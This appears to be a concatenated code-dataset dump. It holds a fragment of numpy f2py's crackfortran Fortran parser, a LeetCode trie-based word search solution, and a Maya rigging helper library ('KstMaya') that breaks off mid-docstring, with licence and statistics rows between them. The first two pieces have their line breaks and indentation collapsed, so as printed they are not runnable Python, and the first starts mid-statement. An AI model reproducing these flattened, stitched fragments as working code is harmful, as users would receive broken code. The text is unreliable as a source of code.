no check if 1 and 'check' not in vars[d]: if ni > 1: vars[d]['check'] = ['%s%s(%s,%i)%s==%s' % (pd, shape_macro, n, i, ad, d)] else: vars[d]['check'] = [ '%slen(%s)%s>=%s' % (pd, n, ad, d)] if 'attrspec' not in vars[d]: vars[d]['attrspec'] = ['optional'] if ('optional' not in vars[d]['attrspec']) and\ ('required' not in vars[d]['attrspec']): vars[d]['attrspec'].append('optional') elif d not in ['*', ':']: #/----< no check if flag: if d in vars: if n not in ddeps: vars[n]['depend'].append(d) else: vars[n]['depend'] = vars[n]['depend'] + ddeps elif isstring(vars[n]): length = '1' if 'charselector' in vars[n]: if '*' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['*'], params) vars[n]['charselector']['*'] = length elif 'len' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['len'], params) del vars[n]['charselector']['len'] vars[n]['charselector']['*'] = length if not vars[n]['check']: del vars[n]['check'] if flag and not vars[n]['depend']: del vars[n]['depend'] if '=' in vars[n]: if 'attrspec' not in vars[n]: vars[n]['attrspec'] = [] if ('optional' not in vars[n]['attrspec']) and \ ('required' not in vars[n]['attrspec']): vars[n]['attrspec'].append('optional') if 'depend' not in vars[n]: vars[n]['depend'] = [] for v, m in list(dep_matches.items()): if m(vars[n]['=']): vars[n]['depend'].append(v) if not vars[n]['depend']: del vars[n]['depend'] if isscalar(vars[n]): vars[n]['='] = _eval_scalar(vars[n]['='], params) for n in list(vars.keys()): if n == block['name']: # n is block name if 'note' in vars[n]: block['note'] = vars[n]['note'] if block['block'] == 'function': if 'result' in block and block['result'] in vars: vars[n] = appenddecl(vars[n], vars[block['result']]) if 'prefix' in block: pr = block['prefix'] ispure = 0 isrec = 1 pr1 = pr.replace('pure', '') ispure = (not pr == pr1) pr = pr1.replace('recursive', '') isrec = (not pr == pr1) m = typespattern[0].match(pr) if m: typespec, selector, attr, edecl = cracktypespec0( m.group('this'), m.group('after')) kindselect, charselect, typename = cracktypespec( typespec, selector) vars[n]['typespec'] = typespec if kindselect: if 'kind' in kindselect: try: kindselect['kind'] = eval( kindselect['kind'], {}, params) except Exception: pass vars[n]['kindselector'] = kindselect if charselect: vars[n]['charselector'] = charselect if typename: vars[n]['typename'] = typename if ispure: vars[n] = setattrspec(vars[n], 'pure') if isrec: vars[n] = 
setattrspec(vars[n], 'recursive') else: outmess( 'analyzevars: prefix (%s) were not used\n' % repr(block['prefix'])) if not block['block'] in ['module', 'pythonmodule', 'python module', 'block data']: if 'commonvars' in block: neededvars = copy.copy(block['args'] + block['commonvars']) else: neededvars = copy.copy(block['args']) for n in list(vars.keys()): if l_or(isintent_callback, isintent_aux)(vars[n]): neededvars.append(n) if 'entry' in block: neededvars.extend(list(block['entry'].keys())) for k in list(block['entry'].keys()): for n in block['entry'][k]: if n not in neededvars: neededvars.append(n) if block['block'] == 'function': if 'result' in block: neededvars.append(block['result']) else: neededvars.append(block['name']) if block['block'] in ['subroutine', 'function']: name = block['name'] if name in vars and 'intent' in vars[name]: block['intent'] = vars[name]['intent'] if block['block'] == 'type': neededvars.extend(list(vars.keys())) for n in list(vars.keys()): if n not in neededvars: del vars[n] return vars analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z', re.I) def expr2name(a, block, args=[]): orig_a = a a_is_expr = not analyzeargs_re_1.match(a) if a_is_expr: # `a` is an expression implicitrules, attrrules = buildimplicitrules(block) at = determineexprtype(a, block['vars'], implicitrules) na = 'e_' for c in a: c = c.lower() if c not in string.ascii_lowercase + string.digits: c = '_' na = na + c if na[-1] == '_': na = na + 'e' else: na = na + '_e' a = na while a in block['vars'] or a in block['args']: a = a + 'r' if a in args: k = 1 while a + str(k) in args: k = k + 1 a = a + str(k) if a_is_expr: block['vars'][a] = at else: if a not in block['vars']: if orig_a in block['vars']: block['vars'][a] = block['vars'][orig_a] else: block['vars'][a] = {} if 'externals' in block and orig_a in block['externals'] + block['interfaced']: block['vars'][a] = setattrspec(block['vars'][a], 'external') return a def analyzeargs(block): setmesstext(block) implicitrules, attrrules = buildimplicitrules(block) if 'args' not in block: block['args'] = [] args = [] for a in block['args']: a = expr2name(a, block, args) args.append(a) block['args'] = args if 'entry' in block: for k, args1 in list(block['entry'].items()): for a in args1: if a not in block['vars']: block['vars'][a] = {} for b in block['body']: if b['name'] in args: if 'externals' not in block: block['externals'] = [] if b['name'] not in block['externals']: block['externals'].append(b['name']) if 'result' in block and block['result'] not in block['vars']: block['vars'][block['result']] = {} return block determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z', re.I) determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(?P<name>[\w]+)|)\Z', re.I) determineexprtype_re_3 = re.compile( r'\A[+-]?[\d.]+[\d+\-de.]*(_(?P<name>[\w]+)|)\Z', re.I) determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z', re.I) determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z', re.I) def _ensure_exprdict(r): if isinstance(r, int): return {'typespec': 'integer'} if isinstance(r, float): return {'typespec': 'real'} if isinstance(r, complex): return {'typespec': 'complex'} if isinstance(r, dict): return r raise AssertionError(repr(r)) def determineexprtype(expr, vars, rules={}): if expr in vars: return _ensure_exprdict(vars[expr]) expr = expr.strip() if determineexprtype_re_1.match(expr): return {'typespec': 'complex'} m = determineexprtype_re_2.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess( 'determineexprtype: selected kind types not 
supported (%s)\n' % repr(expr)) return {'typespec': 'integer'} m = determineexprtype_re_3.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess( 'determineexprtype: selected kind types not supported (%s)\n' % repr(expr)) return {'typespec': 'real'} for op in ['+', '-', '*', '/']: for e in [x.strip() for x in markoutercomma(expr, comma=op).split('@' + op + '@')]: if e in vars: return _ensure_exprdict(vars[e]) t = {} if determineexprtype_re_4.match(expr): # in parenthesis t = determineexprtype(expr[1:-1], vars, rules) else: m = determineexprtype_re_5.match(expr) if m: rn = m.group('name') t = determineexprtype(m.group('name'), vars, rules) if t and 'attrspec' in t: del t['attrspec'] if not t: if rn[0] in rules: return _ensure_exprdict(rules[rn[0]]) if expr[0] in '\'"': return {'typespec': 'character', 'charselector': {'*': '*'}} if not t: outmess( 'determineexprtype: could not determine expressions (%s) type.\n' % (repr(expr))) return t ###### def crack2fortrangen(block, tab='\n', as_interface=False): global skipfuncs, onlyfuncs setmesstext(block) ret = '' if isinstance(block, list): for g in block: if g and g['block'] in ['function', 'subroutine']: if g['name'] in skipfuncs: continue if onlyfuncs and g['name'] not in onlyfuncs: continue ret = ret + crack2fortrangen(g, tab, as_interface=as_interface) return ret prefix = '' name = '' args = '' blocktype = block['block'] if blocktype == 'program': return '' argsl = [] if 'name' in block: name = block['name'] if 'args' in block: vars = block['vars'] for a in block['args']: a = expr2name(a, block, argsl) if not isintent_callback(vars[a]): argsl.append(a) if block['block'] == 'function' or argsl: args = '(%s)' % ','.join(argsl) f2pyenhancements = '' if 'f2pyenhancements' in block: for k in list(block['f2pyenhancements'].keys()): f2pyenhancements = '%s%s%s %s' % ( f2pyenhancements, tab + tabchar, k, block['f2pyenhancements'][k]) intent_lst = block.get('intent', [])[:] if blocktype == 'function' and 'callback' in intent_lst: intent_lst.remove('callback') if intent_lst: f2pyenhancements = '%s%sintent(%s) %s' %\ (f2pyenhancements, tab + tabchar, ','.join(intent_lst), name) use = '' if 'use' in block: use = use2fortran(block['use'], tab + tabchar) common = '' if 'common' in block: common = common2fortran(block['common'], tab + tabchar) if name == 'unknown_interface': name = '' result = '' if 'result' in block: result = ' result (%s)' % block['result'] if block['result'] not in argsl: argsl.append(block['result']) body = crack2fortrangen(block['body'], tab + tabchar) vars = vars2fortran( block, block['vars'], argsl, tab + tabchar, as_interface=as_interface) mess = '' if 'from' in block and not as_interface: mess = '! 
in %s' % block['from'] if 'entry' in block: entry_stmts = '' for k, i in list(block['entry'].items()): entry_stmts = '%s%sentry %s(%s)' \ % (entry_stmts, tab + tabchar, k, ','.join(i)) body = body + entry_stmts if blocktype == 'block data' and name == '_BLOCK_DATA_': name = '' ret = '%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s' % ( tab, prefix, blocktype, name, args, result, mess, f2pyenhancements, use, vars, common, body, tab, blocktype, name) return ret def common2fortran(common, tab=''): ret = '' for k in list(common.keys()): if k == '_BLNK_': ret = '%s%scommon %s' % (ret, tab, ','.join(common[k])) else: ret = '%s%scommon /%s/ %s' % (ret, tab, k, ','.join(common[k])) return ret def use2fortran(use, tab=''): ret = '' for m in list(use.keys()): ret = '%s%suse %s,' % (ret, tab, m) if use[m] == {}: if ret and ret[-1] == ',': ret = ret[:-1] continue if 'only' in use[m] and use[m]['only']: ret = '%s only:' % (ret) if 'map' in use[m] and use[m]['map']: c = ' ' for k in list(use[m]['map'].keys()): if k == use[m]['map'][k]: ret = '%s%s%s' % (ret, c, k) c = ',' else: ret = '%s%s%s=>%s' % (ret, c, k, use[m]['map'][k]) c = ',' if ret and ret[-1] == ',': ret = ret[:-1] return ret def true_intent_list(var): lst = var['intent'] ret = [] for intent in lst: try: f = globals()['isintent_%s' % intent] except KeyError: pass else: if f(var): ret.append(intent) return ret def vars2fortran(block, vars, args, tab='', as_interface=False): """ TODO: public sub ... """ setmesstext(block) ret = '' nout = [] for a in args: if a in block['vars']: nout.append(a) if 'commonvars' in block: for a in block['commonvars']: if a in vars: if a not in nout: nout.append(a) else: errmess( 'vars2fortran: Confused?!: "%s" is not defined in vars.\n' % a) if 'varnames' in block: nout.extend(block['varnames']) if not as_interface: for a in list(vars.keys()): if a not in nout: nout.append(a) for a in nout: if 'depend' in vars[a]: for d in vars[a]['depend']: if d in vars and 'depend' in vars[d] and a in vars[d]['depend']: errmess( 'vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n' % (a, d)) if 'externals' in block and a in block['externals']: if isintent_callback(vars[a]): ret = '%s%sintent(callback) %s' % (ret, tab, a) ret = '%s%sexternal %s' % (ret, tab, a) if isoptional(vars[a]): ret = '%s%soptional %s' % (ret, tab, a) if a in vars and 'typespec' not in vars[a]: continue cont = 1 for b in block['body']: if a == b['name'] and b['block'] == 'function': cont = 0 break if cont: continue if a not in vars: show(vars) outmess('vars2fortran: No definition for argument "%s".\n' % a) continue if a == block['name'] and not block['block'] == 'function': continue if 'typespec' not in vars[a]: if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']: if a in args: ret = '%s%sexternal %s' % (ret, tab, a) continue show(vars[a]) outmess('vars2fortran: No typespec for argument "%s".\n' % a) continue vardef = vars[a]['typespec'] if vardef == 'type' and 'typename' in vars[a]: vardef = '%s(%s)' % (vardef, vars[a]['typename']) selector = {} if 'kindselector' in vars[a]: selector = vars[a]['kindselector'] elif 'charselector' in vars[a]: selector = vars[a]['charselector'] if '*' in selector: if selector['*'] in ['*', ':']: vardef = '%s*(%s)' % (vardef, selector['*']) else: vardef = '%s*%s' % (vardef, selector['*']) else: if 'len' in selector: vardef = '%s(len=%s' % (vardef, selector['len']) if 'kind' in selector: vardef = '%s,kind=%s)' % (vardef, selector['kind']) else: vardef = '%s)' % (vardef) elif 'kind' in selector: vardef = 
'%s(kind=%s)' % (vardef, selector['kind']) c = ' ' if 'attrspec' in vars[a]: attr = [l for l in vars[a]['attrspec'] if l not in ['external']] if attr: vardef = '%s, %s' % (vardef, ','.join(attr)) c = ',' if 'dimension' in vars[a]: vardef = '%s%sdimension(%s)' % ( vardef, c, ','.join(vars[a]['dimension'])) c = ',' if 'intent' in vars[a]: lst = true_intent_list(vars[a]) if lst: vardef = '%s%sintent(%s)' % (vardef, c, ','.join(lst)) c = ',' if 'check' in vars[a]: vardef = '%s%scheck(%s)' % (vardef, c, ','.join(vars[a]['check'])) c = ',' if 'depend' in vars[a]: vardef = '%s%sdepend(%s)' % ( vardef, c, ','.join(vars[a]['depend'])) c = ',' if '=' in vars[a]: v = vars[a]['='] if vars[a]['typespec'] in ['complex', 'double complex']: try: v = eval(v) v = '(%s,%s)' % (v.real, v.imag) except Exception: pass vardef = '%s :: %s=%s' % (vardef, a, v) else: vardef = '%s :: %s' % (vardef, a) ret = '%s%s%s' % (ret, tab, vardef) return ret ###### def crackfortran(files): global usermodules outmess('Reading fortran codes...\n', 0) readfortrancode(files, crackline) outmess('Post-processing...\n', 0) usermodules = [] postlist = postcrack(grouplist[0]) outmess('Post-processing (stage 2)...\n', 0) postlist = postcrack2(postlist) return usermodules + postlist def crack2fortran(block): global f2py_version pyf = crack2fortrangen(block) + '\n' header = """! -*- f90 -*- ! Note: the context of this file is case sensitive. """ footer = """ ! This file was auto-generated with f2py (version:%s). ! See http://cens.ioc.ee/projects/f2py2e/ """ % (f2py_version) return header + pyf + footer if __name__ == "__main__": files = [] funcs = [] f = 1 f2 = 0 f3 = 0 showblocklist = 0 for l in sys.argv[1:]: if l == '': pass elif l[0] == ':': f = 0 elif l == '-quiet': quiet = 1 verbose = 0 elif l == '-verbose': verbose = 2 quiet = 0 elif l == '-fix': if strictf77: outmess( 'Use option -f90 before -fix if Fortran 90 code is in fix form.\n', 0) skipemptyends = 1 sourcecodeform = 'fix' elif l == '-skipemptyends': skipemptyends = 1 elif l == '--ignore-contains': ignorecontains = 1 elif l == '-f77': strictf77 = 1 sourcecodeform = 'fix' elif l == '-f90': strictf77 = 0 sourcecodeform = 'free' skipemptyends = 1 elif l == '-h': f2 = 1 elif l == '-show': showblocklist = 1 elif l == '-m': f3 = 1 elif l[0] == '-': errmess('Unknown option %s\n' % repr(l)) elif f2: f2 = 0 pyffilename = l elif f3: f3 = 0 f77modulename = l elif f: try: open(l).close() files.append(l) except IOError as detail: errmess('IOError: %s\n' % str(detail)) else: funcs.append(l) if not strictf77 and f77modulename and not skipemptyends: outmess("""\ Warning: You have specified module name for non Fortran 77 code that should not need one (except if you are scanning F90 code for non module blocks but then you should use flag -skipemptyends and also be sure that the files do not contain programs without program statement). """, 0) postlist = crackfortran(files) if pyffilename: outmess('Writing fortran code to file %s\n' % repr(pyffilename), 0) pyf = crack2fortran(postlist) with open(pyffilename, 'w') as f: f.write(pyf) if showblocklist: show(postlist)
bsd-3-clause
7,846,563,131,492,437,000
37.362383
207
0.469806
false
3.83073
false
false
false
guozengxin/myleetcode
python/wordSearchII.py
1
2827
# https://leetcode.com/problems/word-search-ii/ class Solution(object): def findWords(self, board, words): """ :type board: List[List[str]] :type words: List[str] :rtype: List[str] """ trie = Trie() for w in words: trie.insert(w) res = set() for i in xrange(len(board)): for j in xrange(len(board[i])): visited = set() self.dfs(board, trie.root, i, j, visited, res) return list(res) def dfs(self, board, trieNode, i, j, visited, res): if (i, j) in visited: return if (i < 0 or j < 0 or i >= len(board) or j >= len(board[i])): return cur = board[i][j] if cur in trieNode.nodes: if trieNode.nodes[cur].isLeaf: res.add(trieNode.nodes[cur].word) visited.add((i, j)) self.dfs(board, trieNode.nodes[cur], i+1, j, visited, res) self.dfs(board, trieNode.nodes[cur], i, j+1, visited, res) self.dfs(board, trieNode.nodes[cur], i-1, j, visited, res) self.dfs(board, trieNode.nodes[cur], i, j-1, visited, res) visited.remove((i, j)) class TrieNode(object): def __init__(self): """ Initialize your data structure here. """ self.nodes = {} self.word = '' self.isLeaf = False class Trie(object): def __init__(self): self.root = TrieNode() def insert(self, word): """ Inserts a word into the trie. :type word: str :rtype: void """ node = self.root for c in word: if c in node.nodes: node = node.nodes[c] else: newNode = TrieNode() node.nodes[c] = newNode node = newNode node.isLeaf = True node.word = word def search(self, word): """ Returns if the word is in the trie. :type word: str :rtype: bool """ node = self.root for c in word: if c in node.nodes: node = node.nodes[c] else: return False return node.isLeaf def startsWith(self, prefix): """ Returns if there is any word in the trie that starts with the given prefix. :type prefix: str :rtype: bool """ node = self.root for c in prefix: if c in node.nodes: node = node.nodes[c] else: return False return True board = [ ['o','a','a','n'], ['e','t','a','e'], ['i','h','k','r'], ['i','f','l','v'] ] words = ["oath","pea","eat","rain"] s = Solution() print s.findWords(board, words)
mit
7,831,944,678,315,443,000
24.25
70
0.474708
false
3.638353
false
false
false
Leopardob/Kistie
kcode/kcore/KstMaya.py
1
28693
''' K.I.S.T.I.E (Keep, It, Simple, Take, It, Easy) Created on 1 Jan 2013 @author: Leonardo Bruni, leo.b2003@gmail.com Kistie Maya Module Library This Kistie implementation is part of the project 'Kistie_Autorig' by Leonardo Bruni, leo.b2003@gmail.com ''' #ToDo: implement a debug mode to toggle printing import pymel as pm # import pymel lib import maya.cmds as cmds # import maya cmds lib import maya.mel as mel # import maya mel lib import maya.OpenMaya as om # Import kstCore import kcode.kcore.KstCore as _KstCore_ reload(_KstCore_) KstCore = _KstCore_.KstCore() # Import kstMath import kcode.kmath.KstMath as _KstMath_ reload(_KstMath_) KstMath = _KstMath_.KstMath() # Import KstOut import kcode.kcore.KstOut as _KstOut_ reload(_KstOut_) KstOut = _KstOut_.KstOut() class KstMaya(object): # Debug module name variable _debug = 'KstMaya' def __init__(self): KstOut.debug(KstMaya._debug, 'Kistie Maya function module loaded... ') # Channels Operation method def channels_op(self, selections, channels_list, *args): ''' Desc: Make operation on channels Parameter: selections = list of selections where to perform operations *args = type of operation (lock, hide) channels_list = list of channels to perform operations Return void Example: KstMaya.channels_op(['selection'], ['ch','ch','ch'], 'lock=Bool', 'keyable=Bool', 'channelBox=Bool') ''' # Declare variable for errors errors_list = [] # Check if selections type input is valid if not type(selections) is list: KstOut.debug(KstMaya._debug, 'selections must be a list!') errors_list.append('selections') # Check if channels_list input is valid if not type(channels_list) is list: KstOut.debug(KstMaya._debug, 'channels_list must be a list!') errors_list.append('channels') try: # If there are no errors go if len(errors_list) == 0: # Create empty value for python command cmd = '' for sel in selections: for ch in channels_list: for count, arg in enumerate(args): # Build string command cmd = "cmds.setAttr('%s.%s', %s)" % (sel, ch, arg) # Execute string command // ToDo, build a Kistie class for this exec(cmd) # Debug command KstOut.debug(KstMaya._debug, cmd) # Otherwise stop and release errorsList else: KstOut.debug(KstMaya._debug, 'You have some errors: ', errors_list) except: KstOut.error(KstMaya._debug, 'Error found!!! 
'+str(errors_list)) @staticmethod # Get Shape method def get_shape_node(transform): ''' Desc: return a shape from a transform Parameter: transform = transform node that you want get the shape Return: Shape obj from the transform ''' shape_list = cmds.listRelatives(transform, s=True) if shape_list: shape = shape_list[0] return shape else: #KstOut.debug(self._debug_msg, 'No shapes found in current transform, double check') return None # Get Transform method def get_transform_node(self, shape): ''' Desc: return a transform from a shape Parameter: shape = shape node that you want get the transform Return: Transform obj from the shape ''' try: transform_list = cmds.listRelatives(shape, p=True) if transform_list: transform = transform_list[0] return transform except: KstOut.debug(KstMaya._debug, 'No transform found in current shape, double check') pass # Get Parent method @staticmethod def get_his_parent(obj): ''' Desc: return parent from an object Parameter: obj = object to get the parent Return: Parent object ''' try: parent = cmds.listRelatives(obj, p=True) if parent: return parent except: KstOut.debug(KstMaya._debug, 'No parent object found, double check') pass # Get Parent method @staticmethod def get_his_child(obj): ''' Desc: return child from an object Parameter: obj = object to get the child Return: Parent object ''' try: child = cmds.listRelatives(obj, c=True) if child: return child except: KstOut.debug(KstMaya._debug, 'No child object found, double check') pass # Get all input type (nodeType) nodes in scene def get_node_type(self, node_type): ''' Desc: return a list of node founded from nodeType parameter Parameter: node_type = nodes type to find Return: a list with node of that type defined in input ''' node_list = cmds.ls(type=node_type) found_nodes = [] if node_list: KstOut.debug(KstMaya._debug, str(node_type)+' nodes list: ') for node in node_list: KstOut.debug(KstMaya._debug, 'nodetype = '+str(node_type)+'-> '+str(node)) found_nodes.append(node) else: KstOut.debug(KstMaya._debug, 'nodetype "'+str(node_type)+'" not exists!') return found_nodes # Get all input name (nodeName) nodes in scene def get_node_if_name_contains(self, node_name): ''' Desc: return a list of node founded from nodeName parameter Parameter: node_name = nodes name to find Return: a list with node of that contains name defined in input ''' node_list = cmds.ls() found_nodes = [] if node_list: for node in node_list: if node_name in node: KstOut.debug(KstMaya._debug, '-> '+str(node)) found_nodes.append(node) else: KstOut.debug(KstMaya._debug, str(node_name)+' not exists') return found_nodes # Make a copy of the inputObject def duplicate_this(self, input_object, copy_name='cpy_'): ''' Desc: return a obj that is the copy of inputObject with a name defined in nameOfCopy Parameter: input_object = the object to be copied copy_name = the copy name Return: the obj copied from the original with the new name ''' if input_object: #cmds.select(input_object) copy_object = cmds.duplicate(input_object, smartTransform=True, name = copy_name, renameChildren = True) copy_object[0] = cmds.rename(copy_object[0], copy_name+input_object) #print('DEBUG copy object: ', copy_object) # Search all children of the current object for renaming hierarchy = cmds.listRelatives(copy_object, c=True) if hierarchy: for child in hierarchy: cmds.rename(child, copy_name+child[:-1]) KstOut.debug(KstMaya._debug, str(copy_object[0])+" duplicated from "+str(input_object)) return copy_object else: KstOut.debug(KstMaya._debug, ' inputObject empty, check 
selection, or array') # Make connection between two nodes with specified attributes. ToDo: add code to test if the connection already exists; if it does, force-disconnect it first def node_op(self, src, op, dst): ''' Desc: Make node operation between two object+attributes Parameter: src = source object and attr op = operator: this value can be >> connect SRC to DST << connect DST to SRC || disconnect SRC from DST dst = destination object and attr Return: bool attribute, True if connection was done, otherwise False ''' stat = False if src and dst and op: if op == '>>': try: cmds.connectAttr(src, dst, f=True) stat = True except: KstOut.debug(KstMaya._debug, 'Error occurred making connection src, dst') KstOut.debug(KstMaya._debug, 'DEBUG DATA: ') KstOut.debug(KstMaya._debug, '%s = SOURCE' % src) KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst) KstOut.debug(KstMaya._debug, '-> END DATA') print 'CANNOT ', src, dst elif op == '<<': try: cmds.connectAttr(dst, src, f=True) stat = True except: KstOut.debug(KstMaya._debug, 'Error occurred making connection dst, src') KstOut.debug(KstMaya._debug,'DEBUG DATA: ') KstOut.debug(KstMaya._debug, '%s = SOURCE' % src) KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst) KstOut.debug(KstMaya._debug, '-> END DATA') # print '' elif op == '||': try: cmds.disconnectAttr(src, dst) stat = True except: KstOut.debug(KstMaya._debug, 'Error occurred in disconnection') KstOut.debug(KstMaya._debug, 'DEBUG DATA: ') KstOut.debug(KstMaya._debug, '%s = SOURCE' % src) KstOut.debug(KstMaya._debug, '%s = DESTINATION' % dst) KstOut.debug(KstMaya._debug, '-> END DATA') # print '' else: KstOut.debug(KstMaya._debug, ' symbol not defined, you can use (>>, <<, ||)') stat = False return stat else: KstOut.debug(KstMaya._debug, ' double check inputs (source, operator, destination)') KstOut.error(KstMaya._debug, ' double check inputs (source, operator, destination)') return None # Destroy all connections, finally works with keyframes and normal connections def destroy_channels_connections(self, sel, channels_list): ''' Desc: Destroy connections for selected channels sel = current object channels_list = list of channels to disconnect in format [ch,ch,ch,...] 
''' for ch in channels_list: src_attr = cmds.connectionInfo(sel+'.'+ch, sourceFromDestination=True) if src_attr: KstOut.debug(KstMaya._debug, 'SOURCE: '+src_attr) KstOut.debug(KstMaya._debug, 'DEST: '+sel+'.'+ch) cmds.disconnectAttr(src_attr, sel+'.'+ch) # Make constraint in a simpler mode def make_constraint(self, src, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weight=1, aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None): ''' Desc: Make any constraint Parameter: src = source object to constrain from dst = destination object to constrain to constraintType = constraint type offset = maintainOffset bool val Return: constraint str name ''' # var for constraint name constraint = [] type='' # Fix name name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '') # Parent constraint if constraint_type == 'parent': type='PAC' constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weight, st=skip_translate, name=name+'_'+type) # Point constraint elif constraint_type == 'point': type='PC' constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_translate, name=name+'_'+type) # Orient constraint elif constraint_type == 'orient': type='OC' constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, name=name+'_'+type) # Aim constraint, ToDo, optimize elif constraint_type == 'aim': type='AC' if world_up_type == 'object': if world_up_object == None: KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None") else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type) else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weight, sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type) #constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type)) # Delete constraint node if needed if keep_constraint_node == False: cmds.delete(constraint) return constraint # Make multi constraint in a simpler mode def make_multi_constraint(self, src_list, dst, constraint_type='aim', skip_translate='none', skip_rotate='none', maintain_offset=False, weights_list=[1.0], aim_vec=[0,1,0], up_vec=[0,0,1], world_up_type='vector', world_up_vec=[0,0,1], world_up_object=None, keep_constraint_node = True, name = None): ''' Desc: Make a multi constraint for any constraint type Parameter: src_list = source objects to constrain from dst = destination object to constrain to constraintType = constraint type offset = maintainOffset bool val Return: constraint str name ''' # var for constraint name constraint = [] type='' # Fix name name = str(name).replace("u'",'').replace('[',' ').replace(']',' ').replace("'",' ').replace(' ', '') # Loop each element in src_list i = 0 for src in src_list: # Parent constraint if constraint_type == 'parent': type='PAC' constraint = cmds.parentConstraint(src, dst, mo=maintain_offset, w=weights_list[i], st=skip_translate, name=name+'_'+type) i = i+1 # Point constraint elif constraint_type == 'point': type='PC' constraint = cmds.pointConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_translate, name=name+'_'+type) i = i+1 # Orient constraint elif constraint_type == 
'orient': type='OC' constraint = cmds.orientConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, name=name+'_'+type) i = i+1 # Aim constraint, ToDo, optimize elif constraint_type == 'aim': type='AC' if world_up_type == 'object': if world_up_object == None: KstOut.debug(KstMaya._debug, "Check object up variable, can't be set to None") else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, worldUpObject=world_up_object, name=name+'_'+type) else: constraint = cmds.aimConstraint(src, dst, mo=maintain_offset, w=weights_list[i], sk=skip_rotate, aimVector=aim_vec, upVector=up_vec, worldUpType=world_up_type, worldUpVector=world_up_vec, name=name+'_'+type) i = i+1 #constraint = cmds.rename(constraint[0], '%s_%s' % (constraint[0], type)) # Delete constraint node if needed if keep_constraint_node == False: cmds.delete(constraint) return constraint # Get position list from object position def get_position_list_from_objs(self, object_list, coords_space='world'): ''' Desc: Get a position list from object list Parameter: object_list = the object list coords_space = the coordinate space, can be "world" (default), or "local" Return: list with positions ''' position_list = [] # Check if position list is valid if object_list: # Set coords to world if coords_space == 'world': world_space = True object_space = False # Set coord to local elif coords_space == 'local': world_space = False object_space = True for obj in object_list: KstOut.debug(KstMaya._debug, obj) obj_pos = cmds.xform(obj, q=True, t=True, ws=world_space, os=object_space) position_list.append(obj_pos) return position_list else: KstOut.debug(KstMaya._debug, 'Check if inputs are valid') return None # Get cvs count def get_num_cvs(self, curve): ''' Desc: Get the number of cvs of a curve Parameter: curve = curve to get the cv count from Return: number of cvs ''' # If curve is not defined or not valid, release an error if curve: # Get curve shape curve_shape = KstMaya.get_shape_node(curve) # Get degree degree = cmds.getAttr(curve_shape+".degree") # Get spans spans = cmds.getAttr(curve_shape+".spans") # Calculating ncvs with formula spans+degree ncvs = spans+degree # Return the count return ncvs else: cmds.warning("Curve %s is not defined, or is not a curve, double check!" % curve) return None @staticmethod # Get position list from cvs position def get_cvs_position_list_from_curve(curve, coords_space='world'): ''' Desc: Get cv position list from a curve Parameter: curve = curve to get cvs position list from coords_space = the coordinate space, can be "world" (default), or "local" Return: list with positions ''' # If curve is not defined or not valid, release an error if curve: # Define a list with all positions position_list = [] # Define ws var ws = False # Get curve shape curve_shape = KstMaya.get_shape_node(curve) # Get degree degree = cmds.getAttr(curve_shape+".degree") # Get spans spans = cmds.getAttr(curve_shape+".spans") # Calculating ncvs with formula spans+degree ncvs = spans+degree # Define and set ws var for xform if coords_space=='world': ws = True # Iterate over curve cvs for i in range(0, ncvs): pos = cmds.xform(curve_shape+".cv[%s]" % i, q = True, t = True, ws = ws) position_list.append(pos) # Return the list return position_list else: cmds.warning("Curve %s is not defined, or is not a curve, double check!" 
% curve) return None def transfer_connections(self, src, dst, connections_list, mode = 'move'): ''' Desc: Copy or move connections from one node to another Parameter: src = source object to move (or copy) connections from dst = destination object to move (or copy) connections to connections_list = connections list to move or copy Return: None ''' # List connections for src if len(connections_list): for conn in connections_list: src_connections = cmds.listConnections('%s.%s' % (src, conn), c = True, plugs = True) # Now in src_connections[0] there's the original src, and in src_connections[1] the original destination # so, just replace the src_name # Store the current connection curr_conn = src_connections[0].split('.')[1] # If mode is set to move, disconnect the old object if mode == 'move': self.node_op(src_connections[0], '||', src_connections[1]) # Exchange src with specified destination new_src = dst # Reconnect self.node_op('%s.%s' % (new_src, curr_conn), '>>', src_connections[1]) # Insert element in hierarchy def insert_parent(self, src, dst, reset_src_trs = True): ''' Desc: Insert an object in the middle of an existing hierarchy Parameter: src = object to insert dst = destination object that will be reparented Return: None ''' # Check existing hierarchy # Who's the parent parent = KstMaya.get_his_parent(dst) # Who's the child child = KstMaya.get_his_child(dst) # Remake hierarchy cmds.parent(src, parent) cmds.parent(child, src) return parent, src, child def mirror_this(self, obj_to_mirror, plane = 'YZ'): # ToDo: finish and check ''' Desc: 